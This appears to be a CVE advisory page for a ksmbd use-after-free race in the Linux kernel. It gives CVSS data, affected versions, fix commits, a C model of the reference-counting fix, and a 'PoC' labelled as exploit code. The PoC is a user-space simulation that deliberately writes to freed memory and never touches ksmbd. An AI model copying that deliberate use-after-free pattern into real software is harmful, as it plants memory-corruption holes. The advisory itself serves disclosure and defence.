Security Vulnerability Report
CVE-2025-68817 CVSS 7.8 HIGH

Published: 2026-01-13 16:16:04
Last Modified: 2026-02-26 18:43:19
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency

Under high concurrency, a tree-connection object (tcon) is freed on a disconnect path while another path still holds a reference and later executes *_put()/write on it.
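The commit text above names the bug class but not the ownership rule that prevents it. The model below is an added example written for this page, not ksmbd's code and not the content of the referenced fix commits: a single-slot tree-connection table with two lifetime policies, FREE_ON_DISCONNECT (the disconnect path releases the tcon outright, ignoring holders that looked it up earlier, which is the situation the advisory describes) and DROP_REF_ON_DISCONNECT (the table is just one holder, every lookup takes a reference, and only the last put releases the object). The names tcon_lookup, tcon_put, tcon_disconnect and the policy enum are the model's own assumptions; kfree() is modelled by a flag so that a use-after-release can be counted deterministically instead of crashing, and the kernel's actual fix may be structured differently.

```c
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>

/* FREE_ON_DISCONNECT releases the tcon on the disconnect path outright, ignoring
 * holders that looked it up earlier (the bug class in the advisory).
 * DROP_REF_ON_DISCONNECT treats the table as one holder among others: every
 * lookup takes a reference and only the last tcon_put() releases the object. */
enum policy { FREE_ON_DISCONNECT, DROP_REF_ON_DISCONNECT };

struct tcon { atomic_int refcnt, freed; };   /* freed models kfree(); memory is kept so checks stay defined */

struct sess {
    pthread_mutex_t lock;           /* protects the single-slot tcon table */
    struct tcon *tcon;
    enum policy pol;
    atomic_int uaf_hits, releases;  /* accesses after release; release count (>1 = double free) */
};

struct result { int uaf_hits, releases; };

static void tcon_release(struct sess *s, struct tcon *t)   /* stands in for kfree(tcon) */
{
    atomic_fetch_add(&s->releases, 1);
    atomic_store(&t->freed, 1);
}

static struct tcon *tcon_lookup(struct sess *s)   /* find and get under one lock */
{
    pthread_mutex_lock(&s->lock);
    struct tcon *t = s->tcon;
    if (t) atomic_fetch_add(&t->refcnt, 1);
    pthread_mutex_unlock(&s->lock);
    return t;
}

static void tcon_put(struct sess *s, struct tcon *t)   /* last holder releases */
{
    if (atomic_load(&t->freed)) atomic_fetch_add(&s->uaf_hits, 1);   /* *_put() on a released tcon */
    if (atomic_fetch_sub(&t->refcnt, 1) == 1) tcon_release(s, t);
}

static void tcon_disconnect(struct sess *s)
{
    pthread_mutex_lock(&s->lock);
    struct tcon *t = s->tcon;
    s->tcon = NULL;                 /* no new lookups can find it from here on */
    pthread_mutex_unlock(&s->lock);
    if (!t) return;
    if (s->pol == FREE_ON_DISCONNECT) tcon_release(s, t);   /* bug: earlier lookups still hold it */
    else tcon_put(s, t);                                    /* fix: drop only the table's reference */
}

/* Two-step version of the race: lookup, disconnect, then the holder's put. */
struct result sequential_demo(enum policy pol)
{
    struct tcon t = { .refcnt = 1 };
    struct sess s = { .lock = PTHREAD_MUTEX_INITIALIZER, .tcon = &t, .pol = pol };
    struct tcon *held = tcon_lookup(&s);
    tcon_disconnect(&s);
    tcon_put(&s, held);
    return (struct result){ atomic_load(&s.uaf_hits), atomic_load(&s.releases) };
}

static void *worker(void *arg)
{
    struct sess *s = arg;
    struct tcon *t;
    while ((t = tcon_lookup(s)) != NULL) {      /* until the tree is disconnected */
        if (atomic_load(&t->freed)) atomic_fetch_add(&s->uaf_hits, 1);   /* write via dangling tcon */
        tcon_put(s, t);
    }
    return NULL;
}

/* nworkers lookup/put loops racing one disconnect issued from this thread. */
struct result stress(enum policy pol, int nworkers)
{
    struct tcon *t = calloc(1, sizeof *t);
    atomic_store(&t->refcnt, 1);                /* the table's own reference */
    struct sess s = { .lock = PTHREAD_MUTEX_INITIALIZER, .tcon = t, .pol = pol };
    pthread_t *th = calloc(nworkers, sizeof *th);
    for (int i = 0; i < nworkers; i++) pthread_create(&th[i], NULL, worker, &s);
    sched_yield();                              /* let the workers get going first */
    tcon_disconnect(&s);
    for (int i = 0; i < nworkers; i++) pthread_join(th[i], NULL);
    struct result r = { atomic_load(&s.uaf_hits), atomic_load(&s.releases) };
    free(th);
    free(t);                                    /* the model never really freed it */
    return r;
}

int main(void)
{
    struct result v = sequential_demo(FREE_ON_DISCONNECT), f = stress(DROP_REF_ON_DISCONNECT, 8);
    printf("free-on-disconnect: %d uaf, %d release(s); drop-ref-on-disconnect: %d uaf, %d release(s)\n",
           v.uaf_hits, v.releases, f.uaf_hits, f.releases);
    return 0;
}
```

Build with gcc -std=gnu11 -pthread. Under FREE_ON_DISCONNECT the two-step run reports one access to a released tcon; under DROP_REF_ON_DISCONNECT neither the two-step run nor the threaded run reports any, and the object is released exactly once. The property to check in a real fix is the same one the model checks: whoever removes a tcon from its session table must drop only the table's reference and leave freeing to the last put, with the find and the get done under the same lock.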

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 5.15.145 (inclusive) up to but excluding 5.15.199
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.1.71 (inclusive) up to but excluding 6.1.160
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.6.1 (inclusive) up to but excluding 6.6.120
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.7 (inclusive) up to but excluding 6.12.64
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE, from 6.13 (inclusive) up to but excluding 6.18.3
cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.6:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.6:rc6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.6:rc7:*:*:*:*:*:* - VULNERABLE
Linux kernel ksmbd (the exact affected versions follow from the fix commits on kernel.org; the ranges above are the NVD match criteria)
A kernel whose ksmbd predates the relevant stable fix commit is affected:
ksmbd fixed in commit 063cbbc6f595ea36ad146e1b7d2af820894beb21
ksmbd fixed in commit 21a3d01fc6db5129f81edb0ab7cb94fd758bcbea
ksmbd fixed in commit 446beed646b2e426dd53d27358365f8678e1dd01
ksmbd fixed in commit b39a1833cc4a2755b02603eec3a71a85e9dff926
ksmbd fixed in commit d092de8a26c952379ded8e6b0bda31d89befac1a
ksmbd fixed in commit d64977495e44855f2b28d8ce56107c963a7a50e4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note what it is: a user-space model of the race described above, with a malloc'd stand-in for the tcon and pthreads standing in for the two kernel paths. It never opens an SMB connection and never reaches ksmbd, so it does not trigger CVE-2025-68817 on a target; build it with -fsanitize=address to have the modelled use-after-free reported instead of silently corrupting the heap.

```c
// CVE-2025-68817 PoC - ksmbd use-after-free (user-space model)
// Models the race from the advisory in ordinary process memory: one path frees a
// tree connection (tcon) on "disconnect" while another path still holds the
// pointer and then executes *_put() on it. Build and run with:
//   gcc -O1 -g -fsanitize=address -pthread poc.c -o poc && ./poc
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NUM_THREADS    100
#define NUM_ITERATIONS 1000

// Simulated SMB tree-connection structure
typedef struct {
    int  socket_fd;
    char tree_id[64];
    int  ref_count;
} tree_connect_t;

// Shared state used to open the race window
volatile int g_disconnect_flag = 0;
volatile int g_connect_count   = 0;

// Simulated ksmbd_tree_connect_put (vulnerable version): nothing synchronizes
// the disconnect path against a holder that is about to drop its reference.
void ksmbd_tree_connect_put(tree_connect_t *tcon)
{
    int freed_by_disconnect = 0;

    if (tcon == NULL)
        return;

    // Thread A (disconnect path) frees the object while thread B still holds it
    if (g_disconnect_flag) {
        free(tcon);
        freed_by_disconnect = 1;
        printf("[RACE] tree connect freed during concurrent access\n");
    }

    // Thread B's *_put()/write: when the race hit, this writes to freed memory
    tcon->ref_count--;
    if (tcon->ref_count <= 0) {
        if (freed_by_disconnect)
            printf("[USE-AFTER-FREE] wrote to freed tcon at %p\n", (void *)tcon);
        else
            free(tcon);     // normal last-reference release
    }
}

// Connection thread: creates a tcon per iteration, holds it briefly, drops it
void *connect_thread(void *arg)
{
    unsigned int seed = (unsigned int)(intptr_t)arg;   // per-thread rand_r() state

    for (int i = 0; i < NUM_ITERATIONS; i++) {
        tree_connect_t *tcon = malloc(sizeof(*tcon));
        if (tcon == NULL)
            continue;
        tcon->ref_count = 1;
        tcon->socket_fd = rand_r(&seed);
        snprintf(tcon->tree_id, sizeof(tcon->tree_id), "tree_%d", rand_r(&seed));
        __sync_fetch_and_add(&g_connect_count, 1);

        // Hold the reference across a small delay so a disconnect can land in between
        usleep(rand_r(&seed) % 100);

        // Drop the reference; with g_disconnect_flag set this is the UAF path
        ksmbd_tree_connect_put(tcon);
    }
    return NULL;
}

// Disconnect thread: toggles the flag to open and close the race window
void *disconnect_thread(void *arg)
{
    unsigned int seed = (unsigned int)(intptr_t)arg;

    for (int i = 0; i < NUM_ITERATIONS; i++) {
        g_disconnect_flag = 1;
        usleep(rand_r(&seed) % 10);   // keep the window short to mimic a real race
        g_disconnect_flag = 0;
    }
    return NULL;
}

int main(void)
{
    pthread_t threads[NUM_THREADS];

    printf("CVE-2025-68817 PoC - ksmbd use-after-free (user-space model)\n");
    printf("Target: Linux kernel ksmbd_tree_connect_put\n\n");

    // Create a mix of connect and disconnect threads
    for (int i = 0; i < NUM_THREADS; i++) {
        void *(*fn)(void *) = (i % 2 == 0) ? connect_thread : disconnect_thread;
        pthread_create(&threads[i], NULL, fn, (void *)(intptr_t)i);
    }
    for (int i = 0; i < NUM_THREADS; i++)
        pthread_join(threads[i], NULL);

    printf("\nPoC completed. Total connects: %d\n", g_connect_count);
    printf("Note: in the real kernel this race is the UAF in ksmbd; this program only models it\n");
    return 0;
}
```

References

https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21 (Patch)
https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea (Patch)
https://git.kernel.org/stable/c/446beed646b2e426dd53d27358365f8678e1dd01 (Patch)
https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926 (Patch)
https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a (Patch)
https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68817", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:03.983", "lastModified": "2026-02-26T18:43:18.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency\n\nUnder high concurrency, A tree-connection object (tcon) is freed on\na disconnect path while another path still holds a reference and later\nexecutes *_put()/write on it."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nksmbd: corrección de uso después de liberación en ksmbd_tree_connect_put bajo concurrencia\n\nBajo alta concurrencia, un objeto de conexión de árbol (tcon) es liberado en una ruta de desconexión mientras otra ruta aún mantiene una referencia y posteriormente ejecuta *_put()/write sobre él."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.145", "versionEndExcluding": "5.15.199", "matchCriteriaId": "E1261CF8-0493-4918-93E6-5CC197F7F5E8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.71", "versionEndExcluding": "6.1.160", "matchCriteriaId": "9295139C-2E02-401E-8245-07E821E9CCF0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.1", "versionEndExcluding": "6.6.120", "matchCriteriaId": "C5F84D90-D922-47D3-B042-99569840DD8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:*", "matchCriteriaId": "E346B162-D566-4E62-ABDE-ECBFB21B8BFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:rc5:*:*:*:*:*:*", "matchCriteriaId": "E7C78D0A-C4A2-4D41-B726-8979E33AD0F9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:rc6:*:*:*:*:*:*", "matchCriteriaId": "E114E9DD-F7E1-40CC-AAD5-F14E586CB2E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:rc7:*:*:*:*:*:*", "matchCriteriaId": "DC5BD782-474C-4A68-AED7-6EC818FF89AE"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/446beed646b2e426dd53d27358365f8678e1dd01", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}